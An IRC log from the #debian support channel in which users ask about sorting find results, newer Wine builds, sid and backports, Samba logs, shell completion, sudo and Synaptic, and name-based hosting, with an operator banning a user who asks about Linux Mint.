18:19 | <Hydroxide> | or linux from scratch |
18:19 | <Hydroxide> | etc |
18:19 | <simonlnu> | i just use ls -lt (or use my ls alias and add -t to it) |
18:20 | -!- | rawnar [~mark-will@524B605D.cm-4-4b.dynamic.ziggo.nl] has quit [Quit: Leaving] |
18:21 | <monstaRtruck> | well no i need to use find |
18:21 | -!- | angasule [~angasule@user-0c8hj1j.cable.mindspring.com] has quit [Read error: Connection reset by peer] |
18:21 | <monstaRtruck> | find / -name |
18:21 | -!- | angasule [~angasule@user-0c8hj1j.cable.mindspring.com] has joined #debian |
18:21 | <monstaRtruck> | then sort it |
18:23 | <dougmencken> | Hydroxide: I can debootstrap chroot, oh okay |
18:23 | <Hydroxide> | dougmencken: right. follow the instructions on that wiki page to do a cross-arch debootstrap |
18:23 | -!- | ele [~ele@host207-138-dynamic.48-82-r.retail.telecomitalia.it] has left #debian [Sto andando via] |
18:23 | -!- | vodka [~paper@85.Red-83-41-151.dynamicIP.rima-tde.net] has quit [Quit: Leaving] |
18:23 | -!- | zem [~voodoo@93-142-213-253.adsl.net.t-com.hr] has joined #debian |
18:23 | -!- | adema [~adema@85-171-220-49.rev.numericable.fr] has quit [Ping timeout: 480 seconds] |
18:25 | -!- | kolter [~kolter@2a01:e0b:1000:13:216:3eff:fe00:3e] has quit [Ping timeout: 480 seconds] |
18:25 | -!- | aguitel [~aguitel@200.3.186.228] has joined #debian |
18:25 | -!- | mentor [~mentor@host-78-148-92-235.as13285.net] has joined #debian |
18:25 | -!- | aguitel [~aguitel@200.3.186.228] has quit [Remote host closed the connection] |
18:25 | -!- | user_ [~user@AToulouse-156-1-109-189.w90-30.abo.wanadoo.fr] has joined #debian |
18:26 | <monstaRtruck> | simonlnu is there a way? |
18:27 | -!- | gnugr [~vangelis@79.167.78.18] has quit [Read error: Connection reset by peer] |
18:27 | <dougmencken> | okay, thanks, I'll try |
18:27 | -!- | dougmencken [~username@93.123.156.139] has quit [Quit: Lost terminal] |
18:30 | -!- | mode/#debian [+l 485] by debhelper |
18:30 | -!- | konverguoju [~konverguo@91-233-178-98.inet.vub.lt] has quit [Ping timeout: 480 seconds] |
18:30 | -!- | hachi [hachi@216.218.163.88] has joined #debian |
18:31 | <hachi> | hey folks, I'm getting an error in debian installer today, is this common? |
18:32 | <hachi> | the md-modules appears to be missing from the http://http.us.debian.org/debian/pool/main/l/linux-modules-di-amd64-2.6/ |
18:32 | <hachi> | but it's listed in the Packages.gz for the installer |
18:32 | <hachi> | Filename: pool/main/l/linux-kernel-di-amd64-2.6/md-modules-2.6.32-5-amd64-di_1.76+squeeze6_amd64.udeb |
18:32 | -!- | Domovoy [~user@AToulouse-156-1-147-103.w90-30.abo.wanadoo.fr] has quit [Ping timeout: 480 seconds] |
18:33 | -!- | adema [~adema@85-171-220-49.rev.numericable.fr] has joined #debian |
18:35 | -!- | bujin [~owner@75-151-39-165-Naples.hfc.comcastbusiness.net] has quit [Quit: Leaving] |
18:37 | -!- | philipp [~asdf@chello084113015143.2.12.vie.surfer.at] has joined #debian |
18:37 | <philipp> | guys i need to install the wine version 1.3.12... how to do? |
18:37 | <ansgar> | Hmm, looks broken. |
18:37 | <simonlnu> | monstaRtruck: you don't need the sort |
18:38 | -!- | semko [~semko@dhcp-186-175.gjk.dk] has joined #debian |
18:38 | <monstaRtruck> | well i need to sort it by date descending |
18:38 | <abrotman> | philipp: see winehq.org |
18:39 | <philipp> | abrotman, thx for thre hint! never would have figured that out myself -.- |
18:39 | -!- | Fotografiona_ [~Fotografi@dslb-092-078-249-145.pools.arcor-ip.net] has joined #debian |
18:39 | <semko> | noob question: after i add sid repos do i do a dist-upgrade? is this dangerous? |
18:39 | <abrotman> | philipp: in short, the wine in Debian is very out of date |
18:39 | <philipp> | abrotman, it tells me to install a lot of packages but every time i wanna install one it tells me the dependencys are not met |
18:40 | <abrotman> | semko: it is .. why do you think you want to use sid ? |
18:40 | <abrotman> | philipp: i haven't seen the instructions |
18:41 | <philipp> | abrotman, i tried play on linux to install the game... it allways forces me to the version 1.3.28 wich does not work |
18:41 | -!- | bst_ [~bst@net192-0-245-109.mbb.telenor.rs] has quit [Remote host closed the connection] |
18:41 | -!- | bst_ [~bst@net192-0-245-109.mbb.telenor.rs] has joined #debian |
18:41 | <abrotman> | philipp: i odn't know much about wine .. i was just answering your question about how to get that version |
18:41 | <abrotman> | judd: versions wine |
18:41 | <judd> | Package: wine on i386 -- lenny: 1.0.1-1; squeeze: 1.0.1-3.1; sid: 1.0.1-3.5; experimental: 1.1.24-2 |
18:41 | <abrotman> | so out of date ... |
18:42 | <semko> | abrotman: i don't want to use sid right now. but it is nice to use latest or as new as possible versions of programs |
18:42 | <retrospectacus> | !newer wine |
18:42 | <dpkg> | Debian has both wine and wine-unstable packages that contain various releases of Wine. They have not been recently updated as it was not possible to build packages for amd64 with the tools in Debian. Ask me about <wine>, <cxoffice>, <siyh>. |
18:42 | <philipp> | i need 1.3.12 - 1.3.28 |
18:42 | <philipp> | i need 1.3.12 - 1.3.22 sry |
18:42 | <semko> | judd: versions iceweasel |
18:42 | <judd> | Package: iceweasel on i386 -- lenny: 3.0.6-3; lenny-security: 3.0.6-3; lenny-backports: 3.5.16-11~bpo50+1; squeeze: 3.5.16-11; squeeze-proposed-updates: 3.5.16-12; squeeze-security: 3.5.16-12; wheezy: 9.0.1-1; sid: 10.0-2 |
18:43 | <abrotman> | semko: you're doing it the wrong way .. you're going to break sometihng .. what are you really trying to do ? |
18:43 | -!- | kriller__ [~kriller@nat.nordija.com] has quit [Ping timeout: 480 seconds] |
18:44 | -!- | reklipz1 [~nmschulte@ip72-198-206-85.om.om.cox.net] has joined #debian |
18:45 | -!- | asr33 [~asr33@64.56.250.251] has joined #debian |
18:45 | <semko> | abrotman, i am not gonna use sid repos at least till i have anough knowledge about debian. just wanted to know the proper way to use sid |
18:45 | <philipp> | how do i get wine verson 1.3.12 - 1.3.22 on squeeze? |
18:45 | <abrotman> | semko: again, you really sohuldn't .. it's not for people woh want to have a usable machine .. things break, sometimes badly |
18:46 | <simonlnu> | monstaRtruck: date descending, you mean oldest first, or last? |
18:46 | <semko> | abrotman, i know but some people still claim that it is not that "unstable" |
18:46 | -!- | Fotografiona [~Fotografi@dslb-094-223-108-042.pools.arcor-ip.net] has quit [Ping timeout: 480 seconds] |
18:47 | <monstaRtruck> | newest 1st |
18:47 | <philipp> | how do i get wine verson 1.3.12 - 1.3.22 on squeeze? |
18:47 | <simonlnu> | monstaRtruck: that's the default iirc |
18:47 | <monstaRtruck> | in find? |
18:47 | <simonlnu> | no, ls |
18:47 | <simonlnu> | ls -lRt |
18:47 | <semko> | abrotman: do you use squueze with backports? |
18:47 | <monstaRtruck> | i know lol |
18:47 | <simonlnu> | you get recursive, time sorted, and long listing |
18:47 | <abrotman> | semko: no, but i've been using Debian over 10 years |
18:47 | <monstaRtruck> | i am talking about find / -name 'blah' |
18:48 | <abrotman> | semko: but on machines that I want to work and use daily, I don't run sid |
18:48 | <simonlnu> | why are you using find when ls does the job? |
18:48 | <simonlnu> | aah |
18:48 | <monstaRtruck> | because im trying to find all html files |
18:48 | <philipp> | how do i get wine verson 1.3.12 - 1.3.22 on squeeze? |
18:48 | <monstaRtruck> | on / |
18:48 | <monstaRtruck> | wine is the reason i dont use debian alot |
18:49 | <abrotman> | philipp: repeating every four minutes won't get you an answer |
18:49 | <monstaRtruck> | but i heard there is a way |
18:49 | <semko> | abrotman, i guess using backports wont make squeeze unstable. is that correcct? |
18:49 | <abrotman> | semko: yes and no .. if you try to use *all* of the backports, it may lead to instability .. generally a few of them are okay |
18:49 | <abrotman> | monstaRtruck: which distro do you use? |
18:49 | -!- | reklipz [~nmschulte@ip72-198-206-85.om.om.cox.net] has quit [Ping timeout: 480 seconds] |
18:49 | <monstaRtruck> | linux mint |
18:50 | <abrotman> | monstaRtruck: so why are you asking questions here? |
18:50 | <monstaRtruck> | and working on geting debian6 to work with nvidia |
18:50 | -!- | degli [~degli@host144-126-dynamic.20-87-r.retail.telecomitalia.it] has quit [Quit: Leaving] |
18:50 | <monstaRtruck> | seriously? |
18:50 | <abrotman> | yes .. seriously |
18:50 | <monstaRtruck> | what is your problem |
18:51 | <semko> | abrotman, i plan to use backports for some programs like pidgin and iceweasel--if they are newer versions |
18:51 | <abrotman> | You're using Mint, why would you ask questoins here? |
18:51 | <abrotman> | semko: For IW, use mozilla.debian.net |
18:52 | <simonlnu> | monstaRtruck: because non-debian isn't supported here |
18:52 | <semko> | abrotman, thanks for your advice |
18:52 | <monstaRtruck> | i have debian |
18:53 | <monstaRtruck> | STOP ur insanity |
18:53 | <abrotman> | monstaRtruck: you're developing HTML files on your Debian box? |
18:53 | -!- | semko [~semko@dhcp-186-175.gjk.dk] has quit [Quit: Leaving] |
18:54 | <monstaRtruck> | dood i want to hit u rite now |
18:54 | -!- | jeflui [~jeflui@201-92-151-230.dsl.telesp.net.br] has joined #debian |
18:54 | -!- | kevin8t8 [~kevin8t8@71-220-202-16.eugn.qwest.net] has quit [Read error: Connection reset by peer] |
18:54 | -!- | reklipz1 [~nmschulte@ip72-198-206-85.om.om.cox.net] has quit [Remote host closed the connection] |
18:55 | <abrotman> | monstaRtruck: this channel doesn't support Mint, end of discussion. If you need Mint help, ask them, if they can't, maybe try a general linux channel like ##linux on freenode. |
18:55 | <simonlnu> | real productive way to express yourself |
18:55 | <ml|> | monstaRtruck: relax, it is just a question and there rules here |
18:55 | <monstaRtruck> | thx simonlnu for helping me with find, a general linux comand |
18:56 | -!- | reklipz [~nmschulte@ip72-198-206-85.om.om.cox.net] has joined #debian |
18:57 | * | ml| notes that #debian is not ##linux |
18:57 | <abrotman> | nor #mint-linux |
18:58 | -!- | mark76 [~quassel@cpc10-nfds14-2-0-cust293.8-2.cable.virginmedia.com] has quit [Remote host closed the connection] |
18:58 | <ml|> | yeah, _only_ debian is supported here |
18:59 | -!- | kevin8t8 [~kevin8t8@71-220-202-16.eugn.qwest.net] has joined #debian |
18:59 | <monstaRtruck> | so help the guy install wine |
18:59 | <monstaRtruck> | instead of spening an hour crying about the stuff some1 already helped me with |
19:00 | -!- | kolter [~kolter@2a01:e0b:1000:13:216:3eff:fe00:3e] has joined #debian |
19:00 | -!- | Blacker47 [~Blacker47@p57A909DD.dip0.t-ipconnect.de] has quit [Quit: Verlassend] |
19:00 | -!- | Fotografiona_ [~Fotografi@dslb-092-078-249-145.pools.arcor-ip.net] has quit [Remote host closed the connection] |
19:01 | <XeL64> | linux mint (lmde) is a debian base distro no ? |
19:01 | <retrospectacus> | doesn't matter |
19:01 | <monstaRtruck> | XeL64 stop they are pedants |
19:01 | <XeL64> | no just structurate ;) |
19:01 | <retrospectacus> | there are hundreds of debian based distros |
19:02 | <ml|> | dpkg: bod |
19:02 | <dpkg> | Your distribution may be based on and have software in common with Debian, but it is not Debian. We don't know what changes were made by your distribution. #debian only supports Debian; please respect our choice to volunteer here to help Debian users. Support other distributions is off-topic on #debian, even if your own distro's channel is clueless or non-existent. |
19:02 | <monstaRtruck> | psychology 101: dont talk to them and they wont talk to you |
19:02 | <monstaRtruck> | the reason im in this room is because i like debian |
19:03 | <monstaRtruck> | and i have it installed |
19:03 | <XeL64> | yeah but if you ask because you got problem with your car you don t go to supermarket you go to mechanics ;) |
19:03 | <monstaRtruck> | furthermore, u didnt have to help me with find | sort |
19:03 | -!- | mode/#debian [+o abrotman] by ChanServ |
19:03 | -!- | mode/#debian [-o abrotman] by abrotman |
19:03 | -!- | mode/#debian [+o abrotman] by ChanServ |
19:03 | -!- | mode/#debian [+b *!*@206.181.80.162] by abrotman |
19:03 | -!- | mode/#debian [-o abrotman] by abrotman |
19:04 | <abrotman> | monstaRtruck: please take a timeout, we'd like to help people that need Debian support, you don't seem to be one of those people |
19:04 | <XeL64> | i think if it s for bug you can t si here bute some commands maybe no ? |
19:04 | -!- | mode/#debian [+o abrotman] by ChanServ |
19:04 | -!- | mode/#debian [+q *!*@206.181.80.162] by abrotman |
19:04 | -!- | mode/#debian [-o abrotman] by abrotman |
19:04 | -!- | mode/#debian [+o abrotman] by ChanServ |
19:05 | -!- | mode/#debian [-b *!*@206.181.80.162] by abrotman |
19:05 | -!- | mode/#debian [-o abrotman] by abrotman |
19:05 | -!- | m42 [~m42@bl15-100-168.dsl.telepac.pt] has quit [Ping timeout: 480 seconds] |
19:05 | -!- | monstaRtruck [~monstaRtr@206.181.80.162] has left #debian [] |
19:06 | -!- | radu is now known as hando |
19:07 | <abrotman> | philipp: from reading the instructions on their site, and the apt stuff there, if you need that *specific* version, looks like you'll have to compile it from source |
19:07 | -!- | the-M [~the-M@TK212017102073.teleweb.at] has quit [Remote host closed the connection] |
19:12 | -!- | thunderrd [~thunderrd@110.77.242.198] has quit [Ping timeout: 480 seconds] |
19:12 | -!- | zlynx [~Lynx@15.211.153.73] has left #debian [] |
19:12 | -!- | phdeswer [~phdeswer@HSI-KBW-46-223-253-0.hsi.kabel-badenwuerttemberg.de] has quit [Ping timeout: 480 seconds] |
19:13 | -!- | bittin [~bittin@c213-100-108-76.cust.tele2.se] has quit [Quit: Ex-Chat] |
19:14 | -!- | esbjorn [~esbjorn@81-235-219-17-no217.tbcn.telia.com] has joined #debian |
19:15 | -!- | mode/#debian [+o abrotman] by ChanServ |
19:15 | -!- | mode/#debian [-q *!*@206.181.80.162] by abrotman |
19:15 | -!- | mode/#debian [-o abrotman] by abrotman |
19:15 | -!- | esbjorn [~esbjorn@81-235-219-17-no217.tbcn.telia.com] has quit [] |
19:16 | -!- | wissem [~localhost@41.226.41.100] has quit [Remote host closed the connection] |
19:16 | -!- | kevin8t8_ [~kevin8t8@71-220-200-138.eugn.qwest.net] has joined #debian |
19:19 | -!- | jhutchins_lt [~jonathan@64-151-37-66.dyn.everestkc.net] has quit [Ping timeout: 480 seconds] |
19:20 | -!- | mode/#debian [+l 475] by debhelper |
19:20 | -!- | Volley [~worf@chello080109200187.3.sc-graz.chello.at] has quit [Quit: Konversation terminated!] |
19:20 | -!- | jibel [~j-lalleme@ACaen-754-1-11-69.w90-51.abo.wanadoo.fr] has quit [Ping timeout: 480 seconds] |
19:21 | -!- | thunderrd [~thunderrd@119.42.77.117] has joined #debian |
19:23 | -!- | kevin8t8 [~kevin8t8@71-220-202-16.eugn.qwest.net] has quit [Ping timeout: 480 seconds] |
19:26 | -!- | reklipz [~nmschulte@ip72-198-206-85.om.om.cox.net] has quit [Quit: Leaving.] |
19:27 | -!- | tobiasr33per [~tobiasr33@toshib14.lnk.telstra.net] has quit [Remote host closed the connection] |
19:28 | <firewall> | hi |
19:28 | -!- | tobiasr33per [~tobiasr33@toshib14.lnk.telstra.net] has joined #debian |
19:29 | <firewall> | how to audit samba in debian ? |
19:29 | -!- | jibel [~j-lalleme@ACaen-754-1-3-36.w90-51.abo.wanadoo.fr] has joined #debian |
19:29 | <retrospectacus> | read the logs |
19:30 | -!- | Caroll [~caroll@faye.complexopequenoprincipe.org.br] has quit [Quit: Leaving] |
19:30 | <abrotman> | audit how ? |
19:31 | <firewall> | how read logs ? |
19:33 | <abrotman> | cat? tail? |
19:33 | <retrospectacus> | they are in /var/log/samba/ |
19:33 | -!- | asr33 [~asr33@64.56.250.251] has quit [Quit: Lost terminal] |
19:33 | -!- | tty234 [telex@anapnea.net] has joined #debian |
19:33 | <retrospectacus> | you can read them with less, cat, tail, etc. |
19:34 | -!- | martin [~martin@modemcable078.143-22-96.mc.videotron.ca] has joined #debian |
19:34 | -!- | martin is now known as Guest1979 |
19:35 | -!- | HuntingBears [~huntingbe@186.188.68.56] has joined #debian |
19:35 | -!- | f8l [~f8l@77-254-76-13.adsl.inetia.pl] has quit [Quit: Good night (UGT)!] |
19:36 | -!- | HuntingBears [~huntingbe@186.188.68.56] has quit [] |
19:36 | <XeL64> | cthuluh si tu es la j'ai un petit soucis post install avec le softraid je n'arrive pas à booter mon systeme |
19:36 | -!- | HuntingBears [~huntingbe@186.188.68.56] has joined #debian |
19:36 | <XeL64> | grub (2 ?) dans squeeze est bien compatible avec les volumes raid ? |
19:37 | -!- | Infiltrator [~tim@115.187.228.99] has quit [Read error: Operation timed out] |
19:37 | -!- | Infiltrator [~tim@115.187.228.99] has joined #debian |
19:38 | <abrotman> | XeL64: English here |
19:38 | <XeL64> | oups mistake sry ;) |
19:38 | -!- | tty234 [telex@anapnea.net] has quit [] |
19:43 | -!- | bst_ [~bst@net192-0-245-109.mbb.telenor.rs] has quit [Remote host closed the connection] |
19:43 | -!- | bst_ [~bst@net192-0-245-109.mbb.telenor.rs] has joined #debian |
19:46 | -!- | hardwalker [~hardwalke@122-117-115-146.HINET-IP.hinet.net] has joined #debian |
19:48 | -!- | blinded [~blinded@74.198.87.14] has joined #debian |
19:48 | <Guest1979> | i have linux mint 12 iso |
19:48 | -!- | kanliot [~anliot@76.5.139.250] has joined #debian |
19:49 | <Guest1979> | i do not have cd and cant boot from usb |
19:49 | -!- | kevin8t8_ [~kevin8t8@71-220-200-138.eugn.qwest.net] has quit [Remote host closed the connection] |
19:49 | -!- | kevin8t8 [~kevin8t8@71-220-200-138.eugn.qwest.net] has joined #debian |
19:50 | <kanliot> | what channel to learn about packaging with the debian tools? |
19:50 | <abrotman> | Guest1979: how is this related to Debian ? |
19:50 | <abrotman> | !tell kanliot about mentors |
19:50 | <blinded> | hello. i'm using the debian squeeze installer on a little arm5 box, but when i choose the default encrypted lvm partitioning scheme the install encounters some strange problems |
19:51 | <Guest1979> | linux mint in not derivative from debian ? |
19:51 | <blinded> | i've tried intalling to microsd as well as a sata hdd, same problem |
19:51 | -!- | CutMeOwnThroat [~boo@p4FEA575B.dip.t-dialin.net] has quit [Quit: Leaving] |
19:51 | <daemonkeeper> | dpkg: tell Guest1979 about based on debian |
19:51 | <retrospectacus> | Guest1979: derivatives are not supported here |
19:51 | <blinded> | does anyone have light to shed on such a problem? |
19:52 | <abrotman> | blinded: did you try without encryption ? |
19:52 | <blinded> | ah sorry, yes |
19:52 | <blinded> | it works great without encryption |
19:52 | <blinded> | err, no enc, and no lvm |
19:52 | <blinded> | even no encryption but with lvm, same issue |
19:52 | -!- | jmr_ [~Jeff@pool-96-255-241-163.washdc.fios.verizon.net] has joined #debian |
19:52 | <Guest1979> | ok forget my intrusion sry |
19:53 | <kanliot> | isn't a mentor kind of hard to get? I just need to learn the tools so i can submit patches. Thanks in advance! |
19:54 | <cquinn> | When building a package fails due to "unexpected upstream changes," where is "upstream" in this context? |
19:54 | <blinded> | when checking logs i see that it fails to 'vgcreate' |
19:55 | <abrotman> | kanliot: you can ask questions there, or read the new maintainer guide |
19:55 | -!- | monstaRtruck [~monstaRtr@206.181.80.162] has joined #debian |
19:55 | -!- | gedr [~gedrty@67.130.166.175] has joined #debian |
19:56 | <gedr> | Hi |
19:56 | <kanliot> | ty abrotman |
19:56 | -!- | monstaRtruck [~monstaRtr@206.181.80.162] has left #debian [] |
19:56 | <gedr> | Does anyone have any guides on the boot process? |
19:56 | -!- | toDaLeft [~toDaSide@dhcp-168-105-246-202.wireless.manoa.hawaii.edu] has joined #debian |
19:57 | <gedr> | As far as I know it is kernel (vmlinuz) that loads a compressed init ram fs thing and than starts /init and /sbin/init |
19:57 | -!- | sigur [~sigur@host133-131-dynamic.52-79-r.retail.telecomitalia.it] has quit [Quit: leaving] |
19:57 | -!- | Guest1979 [~martin@modemcable078.143-22-96.mc.videotron.ca] has quit [Quit: Leaving] |
19:58 | <gedr> | I can load the fs.gz fine, however I have no idea about the init stuff, I have init in /sbin alredy |
19:59 | <abrotman> | that's kind of a big huge vague question |
19:59 | <blinded> | (by it i mean the partitioning script) |
19:59 | <blinded> | (by it i mean the partitioning script) |
19:59 | <gedr> | Is it? |
19:59 | -!- | darkness [~darkness@187.193.168.157] has joined #debian |
19:59 | <gedr> | All I'm looking for is an /init script example |
20:00 | -!- | blinded [~blinded@74.198.87.14] has quit [Quit: leaving] |
20:01 | <gedr> | Debian's is freaking huge man I looked in initrd.img and found initrd |
20:02 | -!- | ao2 [~u@2001:1418:117::1] has quit [Quit: Ex-Chat] |
20:03 | -!- | gedr [~gedrty@67.130.166.175] has quit [Quit: Leaving] |
20:04 | -!- | robbiethe1st [~robbiethe@50.37.127.242] has joined #debian |
20:05 | <firewall> | retrospectacus: read logs tail -f log.smbd ? |
20:05 | -!- | el_erno [~el_erno@201.141.120.94] has quit [Remote host closed the connection] |
20:06 | <retrospectacus> | firewall: sure? |
20:08 | -!- | semko [~semko@dhcp-186-209.gjk.dk] has joined #debian |
20:09 | -!- | Guest1766 [~ziirish@ALille-651-1-75-95.w2-5.abo.wanadoo.fr] has quit [Ping timeout: 480 seconds] |
20:09 | <semko> | my terminal does not autocomplete after pressing tab |
20:10 | <semko> | for instance, it after apt-get install it does not complete the package name or suggest a package if it is not installed |
20:10 | <retrospectacus> | that's correct. |
20:11 | <semko> | how do i get that functionalty? |
20:11 | -!- | jeflui [~jeflui@201-92-151-230.dsl.telesp.net.br] has quit [Remote host closed the connection] |
20:11 | <firewall> | using tail-f log.smbd? I'm not sure |
20:11 | <retrospectacus> | no idea |
20:11 | -!- | trifolio6 [~h@62.43.50.166.dyn.user.ono.com] has quit [Quit: Konversation terminated!] |
20:11 | -!- | andres [~andres@crystalspace3d.org] has quit [Ping timeout: 480 seconds] |
20:12 | <retrospectacus> | firewall: you're not making sense |
20:15 | -!- | darkness [~darkness@187.193.168.157] has quit [Ping timeout: 480 seconds] |
20:15 | -!- | semko [~semko@dhcp-186-209.gjk.dk] has quit [Quit: Leaving] |
20:16 | <ml|> | semko: if you are using zsh 'rehash' after installing something should autocomplete then there after |
20:16 | <ml|> | as he just leaves :) |
20:16 | <firewall> | which is the file that displays the audit of samba? |
20:16 | -!- | bst_ [~bst@net192-0-245-109.mbb.telenor.rs] has quit [Remote host closed the connection] |
20:16 | -!- | bst_ [~bst@net192-0-245-109.mbb.telenor.rs] has joined #debian |
20:17 | -!- | kevin8t8_ [~kevin8t8@71-220-200-227.eugn.qwest.net] has joined #debian |
20:17 | <ml|> | IIRC, 'source ~/.bashrc' should work for bash |
20:18 | <retrospectacus> | it still won't autocomplete package names like apt-get install foo<tab> |
20:18 | <ml|> | in zsh it works |
20:19 | -!- | kevin8t8 [~kevin8t8@71-220-200-138.eugn.qwest.net] has quit [Ping timeout: 480 seconds] |
20:20 | -!- | mode/#debian [+l 468] by debhelper |
20:22 | -!- | tobiasr33per [~tobiasr33@toshib14.lnk.telstra.net] has quit [Remote host closed the connection] |
20:23 | -!- | zz_andres [~andres@crystalspace3d.org] has joined #debian |
20:23 | -!- | zz_andres is now known as andres |
20:25 | -!- | toDaLeft [~toDaSide@dhcp-168-105-246-202.wireless.manoa.hawaii.edu] has quit [Quit: Leaving] |
20:28 | <XeL64> | retro try compinit |
20:28 | <XeL64> | in memory : compinit -U (something but forget need to search) |
20:28 | -!- | bike [~bike@ti0128a380-dhcp0243.bb.online.no] has quit [Read error: Connection reset by peer] |
20:29 | -!- | bike [~bike@ti0128a380-dhcp0243.bb.online.no] has joined #debian |
20:30 | -!- | Black_Prince [~Prince@91.191.20.15] has quit [Ping timeout: 480 seconds] |
20:30 | -!- | tobiasr33per [~tobiasr33@toshib14.lnk.telstra.net] has joined #debian |
20:30 | <retrospectacus> | compinit: command not found |
20:30 | <XeL64> | maybe : autoload -U compinit but something to do before |
20:30 | -!- | aroundthfur [~aroundthf@host-124-93.panorama.sth.ac.at] has joined #debian |
20:31 | <arand> | I keep getting constant certificate errors for gmail imap/smtp in evolution, is there anyway to update the list of trusted certs or so to avoid this? |
20:31 | <retrospectacus> | meh. semko was asking, not me :) |
20:31 | <XeL64> | ok i found but in zsh ;à) |
20:31 | <XeL64> | autoload -U compinit |
20:31 | <retrospectacus> | arand: you could disable SSL |
20:31 | <XeL64> | autoload -U compinit && compinit |
20:32 | -!- | reklipz [~nmschulte@ip72-198-206-85.om.om.cox.net] has joined #debian |
20:32 | <retrospectacus> | autoload: command not found |
20:32 | <XeL64> | for semko ;) |
20:32 | <XeL64> | under zsh ? |
20:32 | -!- | kolter [~kolter@2a01:e0b:1000:13:216:3eff:fe00:3e] has quit [Ping timeout: 480 seconds] |
20:32 | <retrospectacus> | zsh: command not found |
20:32 | <retrospectacus> | :P |
20:32 | <retrospectacus> | whatever, I'm going home! |
20:32 | <arand> | retrospectacus: But I'm wondering if the warnings on the certs are correct in the first place? |
20:32 | <ml|> | XeL64: autoload -Uz compinit in ~/.zshrc and rehash in the current terminal |
20:33 | <arand> | Disabling SSL seems like one of the worst solutions one could do... |
20:33 | <XeL64> | for what z ? |
20:33 | <ml|> | yes, zsh |
20:34 | <XeL64> | -Uz "z" is for ? |
20:34 | <arand> | Does evolution use certs from a common pool in Debian? |
20:34 | <ml|> | oh |
20:36 | -!- | kolter [~kolter@2a01:e0b:1000:13:216:3eff:fe00:3e] has joined #debian |
20:36 | -!- | dvs [~me@cwv.teksavvy.com] has joined #debian |
20:39 | <ml|> | XeL64: man zshcompsys |
20:41 | <XeL64> | ouki |
20:41 | <XeL64> | thx |
20:41 | -!- | ypwong [~anthony@221.218.68.140] has joined #debian |
20:43 | -!- | a16g_ [~anthony@s14.usassh.com] has joined #debian |
20:45 | -!- | AbsintheSyringe [~havoc@chello080109101041.3.15.vie.surfer.at] has joined #debian |
20:50 | -!- | ypwong [~anthony@221.218.68.140] has quit [Ping timeout: 480 seconds] |
20:51 | -!- | studio [~studio@75.21.198.209] has joined #debian |
20:51 | -!- | studio [~studio@75.21.198.209] has quit [] |
20:51 | -!- | tty234_ [telex@anapnea.net] has quit [Ping timeout: 480 seconds] |
20:53 | -!- | AbsintheSyringe [~havoc@chello080109101041.3.15.vie.surfer.at] has quit [Ping timeout: 480 seconds] |
20:55 | -!- | asr33 [~asr33@64.56.250.251] has joined #debian |
20:56 | -!- | gedr [~gedrty@67.130.166.175] has joined #debian |
20:57 | <gedr> | I basically found what I wanted... I have test.gz with a hello world initrd in the root directory... This is called "initramfs" however I am thinking Debian uses initrd? |
20:57 | <abrotman> | no, initramfs |
20:58 | <gedr> | Really? Cool! |
20:58 | -!- | spitfire [~spitfire@c-5fcae455.025-521-6c6b701.cust.bredbandsbolaget.se] has joined #debian |
20:59 | -!- | crshd [~crshd@175.141.9.121] has joined #debian |
21:00 | -!- | mode/#debian [+l 474] by debhelper |
21:00 | -!- | q66 [~quaker66@213.191.105.214] has quit [Quit: Leaving..] |
21:01 | <spitfire> | Make a new user for my desktop. The new user is a sudoer. Still when I start the "Synaptic Package Manger" my sudo pw dows not work. Looked at the cmd for that launcher "su-to-root -X -c /usr/sbin/synaptic" I am sure I could get it to work with gksu but is that the right thing to do? |
21:02 | <spitfire> | I can do a sudo apt-get update though. |
21:03 | <spitfire> | Does "su-to-root -X -c" mean Debian wants the admin pw or just the sudo one? |
21:04 | -!- | nhorquender [~nhorquend@190.162.136.120] has joined #debian |
21:05 | <spitfire> | If thats the case sudo letting sudoers do a apt-get install xxx is weird. |
21:06 | -!- | amblin [~youwish@c-68-58-165-186.hsd1.sc.comcast.net] has quit [Quit: Ex-Chat] |
21:06 | -!- | hychen [~hychen@114-32-21-24.HINET-IP.hinet.net] has joined #debian |
21:07 | <ml|> | spitfire: using gnome? |
21:07 | -!- | TheLaughingMan [~7H3Laughi@99-126-196-172.lightspeed.austtx.sbcglobal.net] has joined #debian |
21:07 | <spitfire> | ml| no I am using xfce with a highly custom DE. |
21:08 | <TheLaughingMan> | Question for people is there a way to setup multiple domains that point to a debian server and have individual programs running the listen on the same port but different domains |
21:08 | -!- | blair [~blair@static-108-0-197-17.lsanca.fios.verizon.net] has quit [Quit: Ex-Chat] |
21:08 | <spitfire> | ml| why do you ask? |
21:10 | <ml|> | spitfire: I believe that synaptic is asking for the keyring password or root password; but I haven't used synaptic in a long time |
21:10 | -!- | nayarb [~nayarb@64.69.46.199] has joined #debian |
21:10 | <spitfire> | ml| yes it is asking for the root pw. |
21:11 | -!- | nayarb [~nayarb@64.69.46.199] has quit [] |
21:11 | -!- | gedr [~gedrty@67.130.166.175] has quit [Quit: Leaving] |
21:11 | <ml|> | spitfire: also you can limit what a user can do using sudo man sudoers |
21:13 | -!- | swo [~swo@ip-95-223-139-208.unitymediagroup.de] has quit [Ping timeout: 480 seconds] |
21:13 | <spitfire> | ml| Yeah I know. I am using ALL for them though. Ill "clean" that up later though. |
21:14 | -!- | PTKDev [~PTKDev@ppp-253-30.24-151.libero.it] has quit [Remote host closed the connection] |
21:15 | <spitfire> | In short I am guessing that only the root admin can do anything. It a way I like that. But still I would like to get to the bottom of the issue |
21:15 | <TheLaughingMan> | Any ideas? |
21:15 | <abrotman> | TheLaughingMan: you can't have multiple programs listening on the same port |
21:15 | <spitfire> | Not the sudoers...kind of weird since I let them. |
21:16 | -!- | swo [~swo@ip-95-223-139-208.unitymediagroup.de] has joined #debian |
21:16 | <TheLaughingMan> | They can be the same port numbers on different interfaces |
21:17 | <simonlnu> | or ips, if it supports that |
21:18 | -!- | aroundthfur [~aroundthf@host-124-93.panorama.sth.ac.at] has quit [Remote host closed the connection] |
21:19 | <TheLaughingMan> | Well I think most interfaces virtual or real only have 1 ip |
21:20 | -!- | ziirish [~ziirish@ALille-651-1-14-73.w92-131.abo.wanadoo.fr] has joined #debian |
21:20 | <TheLaughingMan> | But we are wanting to do subdomains for a game hosting company and instead of doing 1 ip with different ports we want to do subdomains, but we a limited on how many IPs we can use, but I don't think there is a way to have interfaces linked to different domain names |
21:21 | <simonlnu> | you'd be wrong there |
21:21 | -!- | ziirish is now known as Guest1983 |
21:21 | <TheLaughingMan> | On where |
21:22 | <simonlnu> | an interface only having one ip |
